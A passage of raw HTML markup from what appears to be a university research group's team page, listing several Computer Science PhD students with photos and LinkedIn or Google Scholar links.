h-hide-sm style-854-frameImage style-local-182-c76-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c77\" class=\"h-global-transition-all h-heading style-850 style-local-182-c77 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c77\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Sundos Al Subhi</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c78\" class=\"h-text h-text-component style-851 style-local-182-c78 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>PhD Candidate\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c79\" class=\"h-text h-text-component style-902 style-local-182-c79 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c80\" class=\"style-855 style-local-182-c80 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/sundos-al-subhi-88bb97150\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c81-outer\">\n            <div data-colibri-id=\"182-c81\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c81 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c82\" class=\"d-block style-849 style-local-182-c82 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/06/cropped-cropped-cropped-IMG_1240-scaled-1-e1697205818731.jpg\" class=\"wp-image-1744 style-849-image style-local-182-c82-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-849-frameImage style-local-182-c82-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c83\" class=\"h-global-transition-all h-heading style-850 style-local-182-c83 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c83\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Aaja Christie</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c84\" class=\"h-text h-text-component style-851 style-local-182-c84 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>PhD Candidate\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c85\" class=\"h-text h-text-component style-901 style-local-182-c85 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c86\" class=\"style-853 style-local-182-c86 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/aaja-christie-17573657/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c87-outer\">\n            <div data-colibri-id=\"182-c87\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c87 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c88\" class=\"d-block style-856 style-local-182-c88 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-cropped-Emma-e1697205932363.jpg\" class=\"wp-image-1745 style-856-image style-local-182-c88-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-856-frameImage style-local-182-c88-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c89\" class=\"h-global-transition-all h-heading style-850 style-local-182-c89 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c89\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Emma McDaniel</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c90\" class=\"h-text h-text-component style-851 style-local-182-c90 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>PhD Candidate\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c91\" class=\"h-text h-text-component style-852 style-local-182-c91 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c92\" class=\"style-857 style-local-182-c92 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/emmamcdaniel/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=Cwt8OwkAAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c116-outer\">\n            <div data-colibri-id=\"182-c116\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c116 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c117\" class=\"d-block style-854 style-local-182-c117 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-cropped-sara-edwards1-e1697206932891.jpg\" class=\"wp-image-1754 style-854-image style-local-182-c117-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c117-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c118\" class=\"h-global-transition-all h-heading style-850 style-local-182-c118 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c118\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Sara Edwards</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c119\" class=\"h-text h-text-component style-851 style-local-182-c119 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>PhD Student, MS Graduate\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c120\" class=\"h-text h-text-component style-902 style-local-182-c120 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c121\" class=\"style-855 style-local-182-c121 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/sara-edwards-691b8331/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c122-outer\">\n            <div data-colibri-id=\"182-c122\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c122 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c123\" class=\"d-block style-854 style-local-182-c123 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-cropped-cropped-cropped-Ryan-e1697207029774.jpg\" class=\"wp-image-1756 style-854-image style-local-182-c123-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c123-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c124\" class=\"h-global-transition-all h-heading style-850 style-local-182-c124 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c124\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Ryan Garland</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c125\" class=\"h-text h-text-component style-851 style-local-182-c125 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>PhD Student, MS Graduate\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c126\" class=\"h-text h-text-component style-902 style-local-182-c126 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c127\" class=\"style-855 style-local-182-c127 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/ryan-g-aa71a0163\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c105-outer\">\n            <div data-colibri-id=\"182-c105\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c105 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c106\" class=\"d-block style-854 style-local-182-c106 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-cropped-cropped-Jean-e1697206801281.jpg\" class=\"wp-image-1750 style-854-image style-local-182-c106-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c106-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c107\" class=\"h-global-transition-all h-heading style-850 style-local-182-c107 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c107\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Jean Guo</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c108\" class=\"h-text h-text-component style-851 style-local-182-c108 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>PhD Student</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c109\" class=\"h-text h-text-component style-902 style-local-182-c109 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div 